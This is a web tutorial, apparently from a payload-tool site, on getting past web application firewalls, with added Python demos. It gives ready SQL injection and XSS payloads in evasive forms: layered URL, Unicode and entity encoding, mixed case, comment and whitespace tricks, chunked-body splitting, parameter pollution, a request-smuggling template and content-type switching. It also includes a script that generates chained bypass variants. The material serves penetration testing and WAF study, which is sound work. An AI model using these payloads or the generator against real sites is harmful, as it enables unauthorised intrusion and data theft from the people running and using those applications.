WAF Bypass Techniques: Encoding, Chunked Transfer, and Case Manipulation (2025)
Web Application Firewalls (WAFs) are the first line of defense for most web applications. Whether it's AWS WAF, Cloudflare, Akamai, ModSecurity, or Imperva, these firewalls inspect HTTP traffic and block requests matching known attack patterns. But WAFs rely on pattern matching — and pattern matching can be defeated with creative encoding, request manipulation, and protocol-level tricks.
This guide covers battle-tested WAF bypass techniques used by professional pentesters and bug bounty hunters in 2025.
Understanding WAF Detection Mechanisms
Before bypassing a WAF, understand how it works:
- Signature-based: Matches against a database of known attack patterns (e.g., UNION SELECT, <script>)
- Anomaly-based: Flags requests that deviate from a learned baseline (unusual parameter lengths, encoding, etc.)
- Behavioral: Tracks request frequency, source reputation, and session patterns
- Machine learning: Uses trained models to classify malicious vs. legitimate traffic
Most WAFs combine these approaches, but signature-based detection still does most of the blocking, and it is the layer the techniques below target. Commercial WAFs normalize input before matching (URL decoding, case folding, comment and whitespace collapsing), so a single transformation rarely gets through on its own; the bypasses that work exploit a gap between what the WAF normalizes and what the backend actually decodes or executes.
Encoding-Based Bypasses
URL Encoding
The most fundamental bypass. A WAF normally URL-decodes once before matching, so a second layer of encoding hides the signature. The catch is that the payload is only useful if the backend decodes the extra layers too (a web server that decodes the URL followed by application code that calls urldecode() again, for example); if it doesn't, the payload reaches the application still encoded and does nothing:
# Single URL encoding
%27%20OR%201%3D1--
# Double URL encoding
%2527%2520OR%25201%253D1--
# Triple URL encoding (for layered WAF + app decoding)
%252527%252520OR%2525201%25253D1--
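As an added illustration (not code from the page or from Payload Playground), the following Python models a WAF that decodes one layer before matching and a backend that decodes one or more layers, so you can see exactly when double and triple encoding help and when they merely deliver an inert string. The substring signature, the decode-layer counts and the payload are constructed assumptions for the demo.

```python
from urllib.parse import quote, unquote

# Constructed rule: a crude substring signature standing in for a real WAF rule set.
SIGNATURE = "or 1=1"


def encode_layers(payload: str, layers: int) -> str:
    """Percent-encode `payload` `layers` times (layer 2 turns %27 into %2527, and so on)."""
    encoded = payload
    for _ in range(layers):
        encoded = quote(encoded, safe="")
    return encoded


def decode_layers(raw: str, layers: int) -> str:
    """Percent-decode `raw` `layers` times; a single pass is what most WAFs and web servers do."""
    decoded = raw
    for _ in range(layers):
        decoded = unquote(decoded)
    return decoded


def waf_blocks(raw: str, waf_decode_layers: int = 1) -> bool:
    """Simulated WAF: decode a fixed number of times, then signature-match case-insensitively."""
    return SIGNATURE in decode_layers(raw, waf_decode_layers).lower()


def attempt(payload: str, enc_layers: int, waf_decode_layers: int, backend_decode_layers: int) -> dict:
    """Run one encoded variant through the simulated WAF and backend.

    `effective` is True only when the WAF lets it through AND the backend decodes
    enough layers to reconstruct the original payload.
    """
    raw = encode_layers(payload, enc_layers)
    blocked = waf_blocks(raw, waf_decode_layers)
    delivered = decode_layers(raw, backend_decode_layers)
    return {
        "raw": raw,
        "blocked": blocked,
        "delivered": delivered,
        "effective": (not blocked) and delivered == payload,
    }


if __name__ == "__main__":
    payload = "' OR 1=1--"  # constructed sample payload
    # Single encoding: the WAF's one decode pass exposes the signature.
    print(attempt(payload, 1, 1, 1))
    # Double encoding, backend decodes twice (server + application): passes and lands intact.
    print(attempt(payload, 2, 1, 2))
    # Double encoding, backend decodes once: passes the WAF but arrives still encoded and is inert.
    print(attempt(payload, 2, 1, 1))
```

The third call is the case to watch for in real testing: a request that is not blocked is not the same as a request that executes, which is why the methodology section insists on verifying execution after every transformation.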
Use our Encoding Pipeline to chain multiple encoding layers and test which combination slips through.
Unicode and UTF-8 Encoding
WAFs often fail to normalize Unicode representations while the backend does. Full-width characters become their ASCII equivalents when the application applies NFKC normalization or a best-fit conversion to a narrow code page; overlong UTF-8 sequences are rejected by RFC 3629-compliant decoders and only get through on legacy parsers:
# Unicode full-width characters
＜script＞alert(1)＜/script＞
# UTF-8 overlong encoding (non-standard but some parsers accept it)
%C0%BC = <
%C0%BE = >
# JavaScript/JSON Unicode escapes (decoded when the value is parsed as JSON or lands inside a script string)
\u003Cscript\u003Ealert(1)\u003C/script\u003E
HTML Entity Encoding
Mix decimal, hex, and named HTML entities to confuse WAF pattern matching. Entities are only decoded by an HTML parser, so this works where the payload lands in an attribute value or another HTML context the browser decodes, or where the application HTML-decodes input itself:
# Mixed HTML entities
&#60;script&#x3E;alert(1)&lt;/script&gt;
# Zero-padded hex entities
&#x0000003C;script&#x0000003E;
Base64 and Hex Encoding
Some applications decode Base64 or hex input server-side — inject encoded payloads that the WAF sees as harmless strings:
# Base64-encoded payload in a parameter the app decodes
data=PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
# Hex string literal (MySQL): evaluates to the string 'UNION SELECT', not to the keywords, so it cannot replace them in the query
0x554e494f4e2053454c454354 = 'UNION SELECT'
# Use it where the rule blocks quotes or specific strings (table names, file paths) rather than SQL keywords
Our Encoder/Decoder tool supports Base64, hex, URL encoding, and HTML entities — perfect for crafting encoded payloads.
Case Manipulation and Comment Injection
Mixed Case
Rules written without a case-insensitive flag match only the exact casing in the signature, while SQL keywords and HTML tag and attribute names are case-insensitive, so the payload still works:
# SQL injection
uNiOn SeLeCt
UnIoN/**/sElEcT
# XSS
<ScRiPt>alert(1)</ScRiPt>
<IMG SRC=x OnErRoR=alert(1)>
SQL Comment Injection
Inline comments break up keywords that WAFs match as a single token. The reliable form puts the comment between keywords (as in UnIoN/**/sElEcT above). Splitting a keyword itself only works on parsers that strip comments before tokenizing; current MySQL releases treat /**/ as whitespace, so UN/**/ION becomes two tokens and the query fails. Verify against the target version:
# MySQL inline comments inside keywords (see caveat above)
UN/**/ION SEL/**/ECT
/*!50000UNION*/ /*!50000SELECT*/
# Multi-line comments
UNION/*random junk here*/SELECT
# MySQL version-specific comments (executed by MySQL 5.0.0 and later; the number is a minimum version, and other DBMSs see only a comment)
/*!50000UNION ALL SELECT*/
Whitespace Alternatives
Replace spaces with alternative whitespace characters:
# Tab instead of space
UNION%09SELECT
# Newline
UNION%0ASELECT
UNION%0DSELECT
# Vertical tab, form feed
UNION%0BSELECT
UNION%0CSELECT
# MySQL-specific: parentheses as separators
UNION(SELECT(1),(2),(3))
Chunked Transfer Encoding
Chunked transfer encoding splits the HTTP body into chunks. A correct WAF reassembles the chunks before inspection, but some scan the raw stream, or mis-handle chunk extensions and trailers, so the signature never appears contiguously. Requirements: HTTP/1.1, a Transfer-Encoding: chunked header and no Content-Length, chunk sizes in hex, each size line and each chunk terminated by CRLF, and a final 0 chunk followed by an empty line:
Transfer-Encoding: chunked
4
UNIO
7
N SELEC
1
T
0
Advanced technique — use chunk extensions (a ;name=value after the size, which receivers must ignore) and trailer fields after the 0 chunk to further confuse WAF parsers:
Transfer-Encoding: chunked
4;extension=value
UNIO
7;another=ext
N SELEC
1
T
0
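Added example, not part of the original page: a chunked-body encoder that emits the chunk extensions shown above, next to a decoder that handles hex sizes, extensions and trailers the way a correct parser must. Two constructed checks stand in for a WAF, one that scans the wire bytes and one that reassembles first. The host name, path and the UNION SELECT signature are assumptions for the demo.

```python
from typing import List, Optional

KEYWORD = b"UNION SELECT"  # constructed WAF signature for this demo


def chunked_body(pieces: List[bytes], extensions: Optional[List[Optional[str]]] = None) -> bytes:
    """Encode `pieces` as an HTTP/1.1 chunked body, one chunk per piece.

    `extensions[i]`, if given, is appended to chunk i's size line as ";name=value"
    (an RFC 9112 chunk extension, which receivers must ignore).
    """
    out = bytearray()
    for i, piece in enumerate(pieces):
        ext = extensions[i] if extensions and i < len(extensions) else None
        size_line = f"{len(piece):x}" + (f";{ext}" if ext else "")
        out += size_line.encode("ascii") + b"\r\n" + piece + b"\r\n"
    out += b"0\r\n\r\n"  # last chunk; trailer fields would sit between "0\r\n" and the final "\r\n"
    return bytes(out)


def dechunk(body: bytes) -> bytes:
    """Reassemble a chunked body the way a correct parser does.

    Hex sizes, chunk extensions and a trailer section after the 0 chunk are handled;
    a missing chunk terminator raises ValueError instead of silently resyncing.
    """
    pos = 0
    data = bytearray()
    while True:
        eol = body.index(b"\r\n", pos)
        size_field = body[pos:eol].split(b";", 1)[0].strip()  # drop any chunk extension
        size = int(size_field.decode("ascii"), 16)
        pos = eol + 2
        if size == 0:
            return bytes(data)  # trailers, if present, follow and are ignored here
        data += body[pos:pos + size]
        pos += size
        if body[pos:pos + 2] != b"\r\n":
            raise ValueError("missing CRLF after chunk data")
        pos += 2


def naive_scan(body: bytes) -> bool:
    """A WAF that pattern-matches the wire bytes without dechunking."""
    return KEYWORD in body.upper()


def dechunked_scan(body: bytes) -> bool:
    """A WAF that reassembles the body before matching."""
    return KEYWORD in dechunk(body).upper()


def build_request(host: str, path: str, body: bytes) -> bytes:
    """Wrap a chunked body in a POST; there is deliberately no Content-Length header."""
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/x-www-form-urlencoded\r\n"
        "Transfer-Encoding: chunked\r\n\r\n"
    )
    return head.encode("ascii") + body


if __name__ == "__main__":
    # Constructed input: the keyword is split across chunk boundaries as in the text.
    pieces = [b"q=1 UNIO", b"N SELEC", b"T 1,2--"]
    body = chunked_body(pieces, ["extension=value", "another=ext", None])
    print(build_request("target.example", "/search", body).decode("ascii"))  # target.example is a placeholder
    print("naive scan blocks:", naive_scan(body))
    print("dechunked scan blocks:", dechunked_scan(body))
```

The split is only invisible to the naive scanner; any WAF that dechunks sees the full keyword, which is why the technique is worth one quick probe rather than a long campaign.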
HTTP Parameter Pollution (HPP)
Send the same parameter multiple times. Which occurrence wins is decided by the application framework, not the web server, and a WAF that resolves duplicates differently from the backend (or inspects each value on its own) can be shown a clean value while the application receives the payload:
# Last occurrence wins: PHP ($_GET), Django QueryDict
# First occurrence wins: Java Servlet getParameter(), Flask request.args.get()
# All occurrences joined with commas: ASP.NET Request.QueryString
# WAF keyed to the first occurrence, PHP backend uses the last
?search=harmless&search=<script>alert(1)</script>
# ASP.NET concatenation: no single value contains SELECT ... FROM, the joined value does
?id=1 UNION SELECT 1&id=2&id=3 FROM users--
# backend sees: 1 UNION SELECT 1,2,3 FROM users--
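To make the framework differences concrete, here is an added Python model (not from the page) that resolves duplicate parameters under first-wins, last-wins and comma-join semantics and checks each view against a constructed SELECT ... FROM signature. The query strings are constructed inputs and the framework mapping is the one stated above.

```python
import re
from urllib.parse import parse_qsl

# Constructed signature: the classic "SELECT ... FROM" rule, case-insensitive.
SIGNATURE = re.compile(r"select\s.*\sfrom", re.IGNORECASE)

# Duplicate-handling rules as seen in common frameworks (assumed mapping for the demo).
SEMANTICS = {
    "first": lambda vals: vals[0],              # Java Servlet getParameter(), Flask request.args.get()
    "last": lambda vals: vals[-1],              # PHP $_GET, Django QueryDict
    "comma_join": lambda vals: ",".join(vals),  # ASP.NET Request.QueryString
}


def values_for(query: str, name: str) -> list:
    """Every occurrence of `name`, in order, without collapsing duplicates."""
    return [v for k, v in parse_qsl(query, keep_blank_values=True) if k == name]


def resolve(query: str, name: str, semantics: str) -> str:
    """What the application ends up using for `name` under the given duplicate rule."""
    vals = values_for(query, name)
    if not vals:
        return ""
    return SEMANTICS[semantics](vals)


def per_value_inspection(query: str, name: str) -> bool:
    """WAF that checks every occurrence separately, never reassembling them."""
    return any(SIGNATURE.search(v) for v in values_for(query, name))


def resolved_inspection(query: str, name: str, semantics: str) -> bool:
    """WAF (or backend) that first resolves duplicates under `semantics`."""
    return bool(SIGNATURE.search(resolve(query, name, semantics)))


def bypass_possible(query: str, name: str, waf_semantics: str, backend_semantics: str) -> bool:
    """True when the WAF's view is clean but the backend's view contains the signature."""
    waf_clean = not resolved_inspection(query, name, waf_semantics)
    return waf_clean and resolved_inspection(query, name, backend_semantics)


if __name__ == "__main__":
    # ASP.NET-style concatenation: no single value holds "SELECT ... FROM"; the joined one does.
    q = "id=1 UNION SELECT 1&id=2&id=3 FROM users--"
    print(resolve(q, "id", "comma_join"))
    print("per-value WAF blocks:", per_value_inspection(q, "id"))
    print("comma_join backend sees injection:", resolved_inspection(q, "id", "comma_join"))
    # First-vs-last disagreement: a WAF keyed to 'first' clears it, a PHP-style backend runs it.
    q2 = "id=1&id=1 UNION SELECT 1,2 FROM users--"
    print("bypass (waf=first, backend=last):", bypass_possible(q2, "id", "first", "last"))
```

The useful habit this encodes: before spending time on HPP, fingerprint the backend framework and work out which occurrence it keeps, then craft the duplicates so that the WAF's chosen occurrence is the harmless one.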
HTTP Request Smuggling for WAF Bypass
If the WAF and backend server parse HTTP differently, you can smuggle payloads past the WAF. In the CL.TE case the WAF honours Content-Length and forwards the whole body as one request, while the backend honours Transfer-Encoding, ends the request at the 0 chunk and treats whatever follows as the start of the next request on that connection, never having inspected it. Content-Length must cover the entire body (the 0 chunk and its terminating empty line, plus the smuggled bytes), and the smuggled bytes must form the start of a valid HTTP request:
# CL.TE smuggling (Content-Length 17 = 5 bytes for the "0\r\n\r\n" terminator + 12 bytes of PAYLOAD_HERE; target.example is a placeholder host)
POST / HTTP/1.1
Host: target.example
Content-Length: 17
Transfer-Encoding: chunked

0

PAYLOAD_HERE
Learn more about request smuggling in our HTTP Smuggling Generator.
Content-Type Manipulation
WAFs may only inspect certain content types, or apply weaker rules to some of them, while the backend framework accepts several. Try switching, and confirm the application still reads the parameter from the new body format:
# Instead of application/x-www-form-urlencoded, try:
Content-Type: application/json
{"param": "' OR 1=1--"}
# Or multipart form data
Content-Type: multipart/form-data; boundary=xyz

--xyz
Content-Disposition: form-data; name="param"

' OR 1=1--
--xyz--
Automated WAF Bypass with Payload Playground
Our WAF Bypass Generator automates these techniques — select a base payload, choose your bypass methods (encoding, case manipulation, comment injection, whitespace substitution), and generate dozens of variants instantly.
Combine it with the SQL Injection Generator for database-specific payloads, or the XSS Generator for script injection variants that evade WAF rules.
Testing Methodology
- Identify the WAF — check response headers (Server, X-Powered-By), error pages, and use tools like wafw00f
- Test baseline — confirm which payloads are blocked vs. allowed
- Apply bypass techniques — start with encoding, then try case manipulation, comments, HPP
- Chain techniques — combine multiple bypasses (e.g., double-encoded + mixed case + inline comments)
- Verify execution — ensure the payload still executes after all transformations
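As an added example, not the page's WAF Bypass Generator or any of its code, the following Python implements the transform-and-chain idea from the case manipulation, comment injection and whitespace sections together with the chaining step above: each technique is a small function, and generate() enumerates ordered chains of them and deduplicates by output. The transform set, the keyword list and the /*!50000 prefix are choices made for the demo.

```python
import re
from itertools import permutations
from urllib.parse import quote

# Keywords to wrap in MySQL version comments (assumed list for the demo).
SQL_KEYWORDS = r"\b(UNION|SELECT|FROM|WHERE|AND|OR)\b"


def mixed_case(s: str) -> str:
    """Alternate the case of every character (uNiOn sElEcT); SQL keywords are case-insensitive."""
    return "".join(c.lower() if i % 2 == 0 else c.upper() for i, c in enumerate(s))


def inline_comments(s: str) -> str:
    """Replace each run of whitespace with /**/ (between tokens, never inside a keyword)."""
    return re.sub(r"\s+", "/**/", s)


def version_comments(s: str) -> str:
    """Wrap SQL keywords in MySQL /*!50000 ... */ so a non-MySQL-aware rule sees only a comment."""
    return re.sub(SQL_KEYWORDS, r"/*!50000\1*/", s, flags=re.IGNORECASE)


def tab_whitespace(s: str) -> str:
    return s.replace(" ", "\t")


def newline_whitespace(s: str) -> str:
    return s.replace(" ", "\n")


def url_encode(s: str) -> str:
    return quote(s, safe="")


TRANSFORMS = {
    "mixed_case": mixed_case,
    "inline_comments": inline_comments,
    "version_comments": version_comments,
    "tab_whitespace": tab_whitespace,
    "newline_whitespace": newline_whitespace,
    "url_encode": url_encode,
}


def apply_chain(payload: str, chain) -> str:
    """Apply transforms left to right; order matters, so url_encode normally goes last."""
    for name in chain:
        payload = TRANSFORMS[name](payload)
    return payload


def generate(payload: str, max_depth: int = 2) -> dict:
    """All ordered chains of distinct transforms up to `max_depth`, keyed by output string.

    Deduplicating by output keeps the test set small: two chains that produce the same
    bytes would get the same WAF verdict, so only the first chain is kept.
    """
    variants = {}
    for depth in range(1, max_depth + 1):
        for chain in permutations(TRANSFORMS, depth):
            variants.setdefault(apply_chain(payload, chain), chain)
    return variants


if __name__ == "__main__":
    # Constructed base payload; each line printed is one candidate to send and then verify.
    for variant, chain in generate("1 UNION SELECT 1,2,3 FROM users--").items():
        print(f"{'+'.join(chain):40} {variant!r}")
```

Feed the variants through the baseline from step 2 and keep a record of which chain produced each accepted request; step 5 then reduces to re-sending those few and checking for actual execution rather than the absence of a block page.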
For a complete reference of WAF-evading payloads, see our WAF Bypass Cheat Sheet.